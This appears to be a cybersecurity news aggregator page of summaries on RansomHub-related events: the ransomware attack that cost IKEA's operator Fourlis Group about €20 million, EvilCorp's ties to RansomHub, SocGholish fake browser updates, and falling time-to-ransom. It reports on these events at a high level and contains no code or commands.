CyberSecurity news

FlagThis - #ransomhub

@www.bleepingcomputer.com //
The Fourlis Group, which operates IKEA stores in Greece, Cyprus, Romania, and Bulgaria, has revealed a significant financial impact stemming from a ransomware attack that occurred in November 2024. The attack, which targeted the online IKEA shops just before the busy Black Friday weekend, resulted in substantial operational disruptions and financial losses. The company confirmed that these losses are estimated to be approximately €20 million ($22.8 million).

The initial signs of the attack became public on December 3, 2024, when the Fourlis Group acknowledged technical issues affecting the IKEA online stores, attributing them to a "malicious external action". While the group manages other retail brands such as Intersport, Foot Locker, and Holland & Barrett, the ransomware attack primarily impacted IKEA's online operations. A forensic investigation later revealed that the temporary unavailability of data was quickly restored, and there was no evidence to suggest any data theft or leaks of personal data occurred as a result of the incident.

Despite the significant financial impact and operational disruptions, no ransomware group has claimed responsibility for the attack to date. The lack of a public claim could indicate that the attackers were unsuccessful in stealing data or that they are pursuing a private settlement with the Fourlis Group. The incident underscores the growing threat of ransomware attacks targeting major retailers and the potential for substantial financial losses and operational challenges these attacks can cause.

Recommended read:
References :
  • BleepingComputer: Fourlis Group, the operator of IKEA stores in Greece, Cyprus, Romania, and Bulgaria, confirmed that the ransomware attack they suffered in November 2024 cost them approximately €20 million in losses.
  • BleepingComputer: The Fourlis Group, which operates IKEA stores in several Eastern European countries, has revealed the significant financial impact of the ransomware attack.
  • Techzine Global: This is a summary of the ransomware attack on the Fourlis Group and the significant financial losses incurred.

@cyble.com //
EvilCorp, a Russia-based cybercriminal enterprise already under sanctions, has been linked to the RansomHub ransomware operation, indicating a concerning level of cooperation between the two groups. Intelligence sources confirm that EvilCorp and RansomHub are actively sharing intrusion methods, indicators of compromise (IOCs), and tactics, techniques, and procedures (TTPs). This collaboration poses a significant threat as it combines the capabilities of a sanctioned entity known for large-scale financial cyberattacks with a prominent ransomware-as-a-service (RaaS) operation. RansomHub, active since February 2024 and reportedly run by Russian-speaking cybercriminals, has become increasingly popular among former affiliates of other RaaS platforms such as ALPHV/BlackCat and LockBit.

One of EvilCorp's signature TTPs involves the use of SocGholish JavaScript malware, also known as FAKEUPDATES, to gain initial access to systems. This malware employs drive-by downloads disguised as web browser software updates. Once a system is infected with SocGholish, EvilCorp affiliates can then deploy the RansomHub ransomware. Given the sanctions imposed on EvilCorp since 2019, organizations that fall victim to this attack face a difficult dilemma: paying the ransom is illegal and can lead to substantial fines from the US Treasury’s Office of Foreign Assets Control. This situation is further complicated by the fact that EvilCorp affiliates are known to rebrand their ransomware and become affiliates of other RaaS operations.

The partnership between EvilCorp and RansomHub highlights the evolving and increasingly complex nature of the cybercrime landscape. Maksim Yakubets, a figure reportedly at the helm of EvilCorp, has a long-standing involvement in high-profile hacking campaigns and has been connected to the LockBit ransomware and the Dridex Banking Trojan. The use of Microsoft Teams and other tools to spread malware via vishing scams further demonstrates the diverse range of tactics employed by these threat actors. Cybersecurity experts advise organizations to be vigilant, monitor for PowerShell commands in Teams messages, and investigate any unusual use of Quick Assist or signed binaries running from unexpected locations.

Recommended read:
References :
  • blog.bushidotoken.net: Tracking Adversaries: EvilCorp, the RansomHub affiliate
  • ThreatMon: Ransomhub Group & New Betruger Backdoor | Technical Malware Analysis Report
  • www.cybersecurity-insiders.com: EvilCorp join with RansomHub to launch global cyber attacks
  • thecyberexpress.com: DragonForce Claims to Be Taking Over RansomHub Ransomware Infrastructure
  • Virus Bulletin: ESET's Jakub SouÄek & Jan Holman discovered clear links between the RansomHub, Play, Medusa & BianLian ransomware gangs by following the trail of tooling that RansomHub offers its affiliates. Their report also looks into EDRKillShifter.

Adam O'Connor@feeds.feedburner.com //
SocGholish, also known as FakeUpdates, is facilitating the distribution of RansomHub ransomware through compromised websites. The malware-as-a-service (MaaS) framework, observed since 2018 and tracked by Trend Micro as Water Scylla, injects malicious scripts into legitimate websites. This action redirects users to deceptive pages disguised as browser update notifications, tricking them into downloading and executing malicious files that initiate the infection process.

Trend Micro researchers have analyzed SocGholish's MaaS framework, highlighting its use of highly obfuscated JavaScript loaders to evade detection and execute various malicious tasks. The SocGholish loader can download and execute malicious payloads, exfiltrate sensitive data, and execute arbitrary commands, providing persistent access for further exploitation and payload deployment. This intrusion set collaborates with threat actors operating rogue Keitaro Traffic Distribution System (TDS) instances to filter traffic, enhancing the effectiveness of RansomHub delivery. Detections have been highest in the United States, with government organizations among the most affected.

Recommended read:
References :
  • www.trendmicro.com: SocGholish’s Intrusion Techniques Facilitate Distribution of RansomHub Ransomware
  • gbhackers.com: SocGholish Exploits Compromised Websites to Deliver RansomHub Ransomware
  • Virus Bulletin: Trend Micro researchers analyse SocGholish’s MaaS framework and its role in deploying RansomHub ransomware through compromised websites using highly obfuscated JavaScript loaders to evade detection and execute various malicious tasks.
  • securityonline.info: A new analysis by Trend Research has shed light on intrusion techniques involving the malware-as-a-service (MaaS) framework known
  • www.cybersecuritydive.com: The ransomware gang is collaborating with SocGholish, an extensive malware operation that employs compromised websites and fake browser updates.
  • Broadcom Software Blogs: Betruger backdoor being used by at least one affiliate of RansomHub.

@www.csoonline.com //
Ransomware gangs are accelerating their operations, significantly reducing the time between initial system compromise and encryption deployment. Recent cybersecurity analyses reveal the average time-to-ransom (TTR) now stands at a mere 17 hours. This marks a dramatic shift from previous tactics where attackers would remain hidden within networks for extended periods to maximize reconnaissance and control. Some groups, like Akira, Play, and Dharma/Crysis, have even achieved TTRs as low as 4-6 hours, demonstrating remarkable efficiency and adaptability.

This rapid pace presents considerable challenges for organizations attempting to defend against these attacks. The shrinking window for detection and response necessitates proactive threat detection and rapid incident response capabilities. The trend also highlights the increasing sophistication of ransomware groups, which are employing advanced tools and techniques to quickly achieve their objectives, often exploiting vulnerabilities in remote monitoring and management tools or using initial access brokers to infiltrate networks, escalate privileges, and deploy ransomware payloads.

Recommended read:
References :
  • ciso2ciso.com: Source: www.csoonline.com – Author: News 17 Feb 20255 mins Incident ResponseRansomware The window for intrusion detection keeps getting shorter as ransomware group’s time-to-ransom (TTR) accelerates.
  • gbhackers.com: Ransomware Gangs Encrypt Systems 17 Hours After Initial Infection
  • www.csoonline.com: Ransomware gangs extort victims 17 hours after intrusion on average
  • ciso2ciso.com: Ransomware gangs extort victims 17 hours after intrusion on average
  • gbhackers.com: Ransomware Gangs Encrypt Systems 17 Hours After Initial Infection
  • Blog RSS Feed: Ransomware has become more than a threat—it's a calculated assault on industries, wielding AI-driven precision to bypass traditional defenses.